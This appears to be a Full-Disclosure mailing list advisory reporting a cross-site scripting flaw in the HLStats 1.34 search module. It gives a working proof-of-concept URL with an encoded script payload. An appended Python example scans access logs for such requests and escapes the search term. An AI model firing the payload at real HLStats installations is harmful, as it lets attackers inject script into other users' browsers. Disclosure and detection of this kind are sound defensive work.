
[Full-disclosure] XSS in HLStats 1.34



Cross-site Scripting Vulnerability in HLStats 1.34

hlstats.php?mode=search&game=cstrike&st=player&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22

Search module fails to sanitize quotes.

kefka
kefka@xxxxxxxxxxxxxxxxxxx

Thanks to RSnake

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
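
Added example, not part of the original post and not HLStats code: a log check that decodes the `q` parameter of `hlstats.php?mode=search` requests and flags markup characters, plus the attribute-safe encoding a search page needs when echoing the term back. The access-log lines, the `<input>` markup and all function names are assumptions made for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Request path and query exactly as given in the advisory.
ADVISORY_REQUEST = ('hlstats.php?mode=search&game=cstrike&st=player'
                    '&q=%22%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E%22')

# Constructed access-log lines (addresses and timestamps are made up).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2007:10:00:00 +0000] "GET /hlstats.php?mode=search&game=cstrike&st=player&q=kefka HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2007:10:00:05 +0000] "GET /' + ADVISORY_REQUEST + ' HTTP/1.1" 200 5342',
    '192.0.2.10 - - [01/Jan/2007:10:00:09 +0000] "GET /hlstats.php?mode=players&game=cstrike HTTP/1.1" 200 9001',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_CHARS = set('<>"\'')


def search_term(target):
    """Return the decoded q value of an hlstats.php search request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith('hlstats.php'):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    if params.get('mode') != ['search'] or 'q' not in params:
        return None
    return params['q'][0]


def suspicious_requests(lines):
    """Yield (line_number, decoded_q) for search terms containing markup characters."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        term = search_term(match.group(1)) if match else None
        if term is not None and MARKUP_CHARS & set(term):
            yield number, term


def render_search_box(term):
    """Echo the term into a (hypothetical) search form with attribute-safe encoding."""
    return '<input type="text" name="q" value="%s">' % html.escape(term, quote=True)


if __name__ == '__main__':
    for number, term in suspicious_requests(SAMPLE_LOG):
        print(number, repr(term), '->', render_search_box(term))
```

With `quote=True` the double quotes in the term become `&quot;`, so the value can no longer close the attribute it is echoed into.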